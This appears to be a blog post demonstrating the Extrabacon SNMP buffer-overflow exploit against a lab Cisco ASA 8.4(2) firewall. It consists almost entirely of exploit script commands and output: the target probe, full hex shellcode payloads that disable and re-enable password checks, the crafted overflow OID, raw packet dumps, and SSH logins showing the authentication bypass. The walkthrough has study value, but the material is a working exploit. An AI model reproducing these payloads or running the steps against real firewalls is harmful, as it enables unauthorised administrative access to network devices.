# Extrabacon (EXBA) exploit


Normal ssh connection

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: cisco
asa> enable
Password: cisco
asa# exit

Checking exploit support

# python extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] Executing:  extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] probing target via snmp
[+] Connecting to asa:161
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[0L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |  value     = <ASN1_TIME_TICKS[363400L]>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |  value     = <ASN1_STRING['asa.lab.net']>

[+] firewall uptime is 363400 time ticks, or 1:00:34

[+] firewall name is asa.lab.net

[+] target is running asa842, which is supported
Data stored in key file  : asa842
Data stored in self.vinfo: ASA842

Launching the exploit (disabling passwords)

# python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
[+] Executing:  extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-disable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-disable
appended PMCHECK_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
appended AAAADMINAUTH_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
[+] random SNMP request-id 80055950
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c3
EXBA msg (369): 3082016d0201010405636973636fa582015f020404c58e8e0201000201013082014f30819106072b060102010101048185bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000431817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000   30 82 01 6D 02 01 01 04  05 63 69 73 63 6F A5 82   0..m.....cisco..
[+] 0010   01 5F 02 04 04 C5 8E 8E  02 01 00 02 01 01 30 82   ._............0.
[+] 0020   01 4F 30 81 91 06 07 2B  06 01 02 01 01 01 04 81   .O0....+........
[+] 0030   85 BF A5 A5 A5 A5 B8 D8  A5 A5 A5 31 F8 BB A5 25   ...........1...%
[+] 0040   F6 AC 31 FB B9 A5 B5 A5  A5 31 F9 BA A2 A5 A5 A5   ..1......1......
[+] 0050   31 FA CD 80 EB 14 BF F0  8F 53 09 31 C9 B1 04 FC   1........S.1....
[+] 0060   F3 A4 E9 0C 00 00 00 5E  EB EC E8 F8 FF FF FF 31   .......^.......1
[+] 0070   C0 40 C3 BF A5 A5 A5 A5  B8 D8 A5 A5 A5 31 F8 BB   .@...........1..
[+] 0080   A5 B5 AD AD 31 FB B9 A5  B5 A5 A5 31 F9 BA A2 A5   ....1......1....
[+] 0090   A5 A5 31 FA CD 80 EB 14  BF E0 13 08 08 31 C9 B1   ..1..........1..
[+] 00a0   04 FC F3 A4 E9 0C 00 00  00 5E EB EC E8 F8 FF FF   .........^......
[+] 00b0   FF 31 C0 40 C3 C3 30 81  B8 06 81 B3 2B 06 01 04   .1.@..0.....+...
[+] 00c0   01 09 09 83 6B 01 03 03  01 01 05 09 5F 81 38 43   ....k......._.8C
[+] 00d0   7B 7A 81 2D 35 81 25 81  25 81 25 81 25 81 03 81   {z.-5.%.%.%.%...
[+] 00e0   6C 04 81 09 04 24 81 09  81 65 81 03 81 45 48 31   l....$...e...EH1
[+] 00f0   81 40 31 81 5B 81 33 10  31 81 76 81 3F 81 2E 81   .@1.[.3.1.v.?...
[+] 0100   2A 81 2A 81 2A 81 01 81  77 81 25 81 25 81 25 81   *.*.*...w.%.%.%.
[+] 0110   25 60 81 0B 81 04 24 81  60 01 00 00 04 31 81 7F   %`....$.`....1..
[+] 0120   81 50 61 81 43 81 10 81  10 81 10 81 10 81 10 81   .Pa.C...........
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 19 47 14   ..............G.
[+] 0160   09 81 0B 7C 24 14 81 0B  07 81 7F 81 60 81 10 05   ...|$.......`...
[+] 0170   00                                                 .
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[80055950L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value     = <ASN1_STRING['']>
[+] received SNMP id 80055950, matches random id sent, likely success
[+] clean return detected

Ssh connection with password disabled

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
asa> enable
Password: <enter>
asa# exit

Launching the exploit (re-enabling passwords)

# python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
[+] Executing:  extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-enable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-enable
appended PMCHECK_ENABLE payload eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80
appended AAAADMINAUTH_ENABLE payload eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80
[+] random SNMP request-id 425184577
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c3
EXBA msg (369): 3082016d0201010405636973636fa582015f02041957cd410201000201013082014f30819106072b060102010101048185eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000431817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000   30 82 01 6D 02 01 01 04  05 63 69 73 63 6F A5 82   0..m.....cisco..
[+] 0010   01 5F 02 04 19 57 CD 41  02 01 00 02 01 01 30 82   ._...W.A......0.
[+] 0020   01 4F 30 81 91 06 07 2B  06 01 02 01 01 01 04 81   .O0....+........
[+] 0030   85 EB 14 BF F0 8F 53 09  31 C9 B1 04 FC F3 A4 E9   ......S.1.......
[+] 0040   2F 00 00 00 5E EB EC E8  F8 FF FF FF 55 31 C0 89   /...^.......U1..
[+] 0050   BF A5 A5 A5 A5 B8 D8 A5  A5 A5 31 F8 BB A5 25 F6   ..........1...%.
[+] 0060   AC 31 FB B9 A5 B5 A5 A5  31 F9 BA A0 A5 A5 A5 31   .1......1......1
[+] 0070   FA CD 80 EB 14 BF E0 13  08 08 31 C9 B1 04 FC F3   ..........1.....
[+] 0080   A4 E9 2F 00 00 00 5E EB  EC E8 F8 FF FF FF 55 89   ../...^.......U.
[+] 0090   E5 57 BF A5 A5 A5 A5 B8  D8 A5 A5 A5 31 F8 BB A5   .W..........1...
[+] 00a0   B5 AD AD 31 FB B9 A5 B5  A5 A5 31 F9 BA A0 A5 A5   ...1......1.....
[+] 00b0   A5 31 FA CD 80 C3 30 81  B8 06 81 B3 2B 06 01 04   .1....0.....+...
[+] 00c0   01 09 09 83 6B 01 03 03  01 01 05 09 5F 81 38 43   ....k......._.8C
[+] 00d0   7B 7A 81 2D 35 81 25 81  25 81 25 81 25 81 03 81   {z.-5.%.%.%.%...
[+] 00e0   6C 04 81 09 04 24 81 09  81 65 81 03 81 45 48 31   l....$...e...EH1
[+] 00f0   81 40 31 81 5B 81 33 10  31 81 76 81 3F 81 2E 81   .@1.[.3.1.v.?...
[+] 0100   2A 81 2A 81 2A 81 01 81  77 81 25 81 25 81 25 81   *.*.*...w.%.%.%.
[+] 0110   25 60 81 0B 81 04 24 81  60 01 00 00 04 31 81 7F   %`....$.`....1..
[+] 0120   81 50 61 81 43 81 10 81  10 81 10 81 10 81 10 81   .Pa.C...........
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 19 47 14   ..............G.
[+] 0160   09 81 0B 7C 24 14 81 0B  07 81 7F 81 60 81 10 05   ...|$.......`...
[+] 0170   00                                                 .
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[425184577L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value     = <ASN1_STRING['']>
[+] received SNMP id 425184577, matches random id sent, likely success
[+] clean return detected

Normal ssh connection

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
Permission denied, please try again.
admin@asa's password:

References

https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/

No comments: